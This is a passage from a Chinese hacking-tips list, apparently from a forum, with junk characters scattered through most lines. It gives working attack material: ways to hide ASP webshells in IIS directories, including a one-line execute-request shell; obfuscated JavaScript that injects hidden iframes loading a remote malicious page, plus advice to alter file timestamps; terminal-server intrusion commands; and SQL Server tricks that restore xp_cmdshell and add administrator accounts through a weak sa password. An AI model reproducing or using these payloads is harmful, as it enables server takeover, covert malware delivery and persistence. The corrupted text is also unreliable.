: s/ t9 x2 Z3 R, X, ` \( F6 u( Z$ o用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
) s) L* y1 E+ E3 e( t: D ~
4 F) i# O# E/ L+ M8 ?/ r4 q53、隐藏ASP后门的两种方法
( H& G8 x( ?2 Y. v U9 l1、建立非标准目录:mkdir images..\
$ a" V8 `7 z0 m+ q2 h$ c: `拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp- X& j8 I: [1 [' I1 I6 ]( _
通过web访问ASP木马:http://ip/images../news.asp?action=login
: J$ h t0 K0 N$ i! q2 m1 Y! r如何删除非标准目录:rmdir images..\ /s0 d1 b% J) o. [6 E5 W2 Z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& P8 n, }% f0 e4 g& W: }- K
mkdir programme.asp
1 s4 H6 T) Z4 [0 N* y新建1.txt文件内容:<!--#include file=”12.jpg”-->
+ k( w7 c. H R7 l) X U新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
b5 a' C0 D0 ]attrib +H +S programme.asp4 P2 @1 C/ E; m0 q6 i
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- F8 U, l4 T F% Z# l6 d9 c- a+ G9 u3 h# o
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
+ Q1 L" ^' i7 p2 b: Z6 O9 E然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
! j: Q7 [- Y, C3 `- ^2 Y7 ?3 d9 E1 d
! \3 ~; o6 [& q4 D$ G" y55、JS隐蔽挂马
`% \' P _* d1 ]1.
# z% |& j+ ^) O {; zvar tr4c3="<iframe src=ht";
& ? S+ Q' E1 X5 mtr4c3 = tr4c3+"tp:/";
3 R2 q$ k! E, J! y2 o. y* rtr4c3 = tr4c3+"/ww";
1 E4 x) v7 }; B2 x' Btr4c3 = tr4c3+"w.tr4";
9 j; C H5 E- Ttr4c3 = tr4c3+"c3.com/inc/m";
, Z, n8 m; [9 r& Ztr4c3 = tr4c3+"m.htm style="display:none"></i";4 m+ F2 p4 |1 v& x
tr4c3 =tr4c3+"frame>'";0 \; L4 D* h* t+ C( y9 f
document.write(tr4c3);
6 f @, ] [1 T1 B6 Y避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。 ^$ l' b' G& f7 |
# R) Z* }# E9 Q4 B2.
& w# S4 C; K$ q3 ^转换进制,然后用EVAL执行。如: s) u" E( A) }2 C% j2 e
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");- _7 V. S7 g2 N+ E$ V
不过这个有点显眼。
' f1 k3 y) T- i: h. G) ]' Z) m3.
6 q0 A1 U- y1 c1 Q" ?/ G g6 pdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');8 p ~# @% n0 c7 J' ^
最后一点,别忘了把文件的时间也修改下。2 J2 _7 f1 ~6 r/ p+ y( e+ j
1 `% m) G) b2 a8 |% n
56.3389终端入侵常用DOS命令
# B, A& e% H {taskkill taskkill /PID 1248 /t* x* n# a! P: [! k1 {
+ c9 N4 h' O6 D% vtasklist 查进程5 L2 z0 z8 v7 n# W
, O% E0 r3 M3 M' @5 g# n0 [& ?cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( {) V; G# Y; G% T
iisreset /reboot2 d$ B. @3 F9 F3 i, `4 ^
tsshutdn /reboot /delay:1 重起服务器
+ k9 `7 A( v% P8 |8 e4 p+ k
! ~$ Z: b2 o: e3 X5 Nlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,3 |( Q" a4 ^" g7 d# ]; s0 u
' N. J% w5 B5 w9 s0 S* a" nquery user 查看当前终端用户在线情况0 T0 S! U, C# ^' @
; G: O( w" ]# Q1 J8 f- k要显示有关所有会话使用的进程的信息,请键入:query process *
' w" r5 h* ?1 R+ y7 e8 L1 T( \; i: t+ t% g C, P- E; [. _
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
- p B/ r' |; i# J- Y& |8 t) i6 Z
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
: \$ ^1 F }$ Y5 J- [) C7 m% I3 E1 E( g1 I* \+ [/ \# G) G
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
' A0 @, H! A/ V- G9 Z: P, i+ t; y8 v ~$ b
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
6 s; M! n4 p* x' T
* c) X3 v6 w6 }7 M2 s" O" a命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
3 S4 _) ?9 O' p+ m$ p
7 f# f- e' |- [% w命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
~% c- J$ y& w1 B6 ^
! I/ q% \3 v$ e% Y命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 ~- I( X2 _& f* O
f* b" B, z. h- {0 p7 x+ c {56、在地址栏或按Ctrl+O,输入:
' C, G/ C7 X4 B' W8 Bjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;. p& V" ~# [ D( V2 u
& x, j8 r$ U5 ^, ]2 ~& {. S源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。2 s, {. ?' q7 I+ ~
3 ]+ m# q3 t [
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
/ `7 ~, d; R" X+ b5 |用net localgroup administrators是可以看到管理组下,加了$的用户的。
/ u4 q5 m# R' O" {! o
+ n* C# I- p! O4 l$ @7 o( I6 p58、 sa弱口令相关命令- O. m: \; c4 I, a7 ^, }4 w; g
5 O7 A: R3 O* ^+ e( E7 v一.更改sa口令方法:# J: T$ b4 T1 E, V% `
用sql综合利用工具连接后,执行命令: |; F0 P8 e ^: h9 w: D" o
exec sp_password NULL,'20001001','sa'
7 ] U6 \* U. U; y1 B p: [% f' U(提示:慎用!)
% a0 e" t; @2 q/ z( V2 }# |1 m1 g6 r# n. d
二.简单修补sa弱口令." V9 h: q" q- n) O a) ~
1 r9 c3 p9 J" A6 U" m方法1:查询分离器连接后执行:( X3 e" w* A4 G
if exists (select * from
- H# s% O7 c& s! i k1 rdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 u- i3 F2 n' ~5 B- {
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)0 E( F4 M* u/ Q) ]# u! v9 ^7 m' g
5 r7 t3 N' n0 ?0 l& J% `8 H
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'% f/ x( B* v& @. ^" {$ |9 B
/ T, ]6 [0 O5 {. a
GO
* j3 ~8 n1 ]" H: _& ~: ?
$ n+ T1 s% B7 U然后按F5键命令执行完毕
, @3 I( N2 i+ ^$ e6 W0 D( i
/ C8 w u5 Z5 v0 d) @方法2:查询分离器连接后
1 Q$ J) |8 B& ?, J( G第一步执行:use master
1 q& s% {0 `' b2 w- `/ l, W& ?第二步执行:sp_dropextendedproc 'xp_cmdshell'; h( E/ c7 o* \+ S; a9 l
然后按F5键命令执行完毕# t4 G+ V4 }1 c, i( n1 z+ v" R& k
' c7 T- W, B: q9 d& C; P5 o9 o
0 t( c, R+ e3 ^; f1 i/ K6 y2 \
三.常见情况恢复执行xp_cmdshell.
( f, G$ `' i6 h4 V' c0 K4 G8 [, a3 Y9 R( h4 v* k
! b2 b% N1 P6 V/ [1 未能找到存储过程'master..xpcmdshell'.% I L. y. l% x# O( w
恢复方法:查询分离器连接后,
( s) D& d9 t0 d# M第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 G) C% O }' z, b7 e. p# R$ ~0 s0 a7 Q第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
7 ~6 d! t! A7 T$ v3 ]( _7 V然后按F5键命令执行完毕5 \( o* w+ l2 p
, U" ~+ ?5 T7 P) n. o; V; S
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
, f* [0 ]9 Y( s3 H! Z恢复方法:查询分离器连接后,
( w+ t* |+ o: u7 f$ _0 E. C第一步执行:sp_dropextendedproc "xp_cmdshell"2 q1 [3 _0 \( q4 c j6 _- ]
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' i k( L* v! z, z' I! t o
然后按F5键命令执行完毕: D9 C# q$ ?1 j! v# x W r3 s7 I7 A
. x5 h/ `4 t) d( b+ u! u9 k1 I3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
3 O L, z; {) ?$ Y9 y( e恢复方法:查询分离器连接后,
7 ^0 Q$ r. |! W# [% N) l第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 }, I0 _, o7 h: C* |: {* J
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 l" |& D6 t! R" h然后按F5键命令执行完毕
; O% r5 ^$ h \$ R& a2 t
3 D/ d/ a! n' i2 l% O7 `四.终极方法.
8 b' M' ?$ a& E% b7 f* L如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:9 r' _, s- v* {0 f
查询分离器连接后,3 i0 [( l3 s( j( [) E: Y' [
2000servser系统:
1 t; z0 w j4 H/ ~+ `$ Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
$ H2 Q. _7 v- O, b0 s$ G1 O# P; T
1 l# ^( e- v2 c; Z* |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. s6 G- ]: }- t4 d5 `" P: l( s% a( b8 N) A% `! i) e, y
xp或2003server系统:
8 V1 j4 z/ C- {
: T K4 C$ M# F" [+ @0 Z0 r( [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" h% p: ^ A7 |0 X
, F9 l: A2 L, ~ n) x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 F# c1 L) W) m+ T/ F; m
|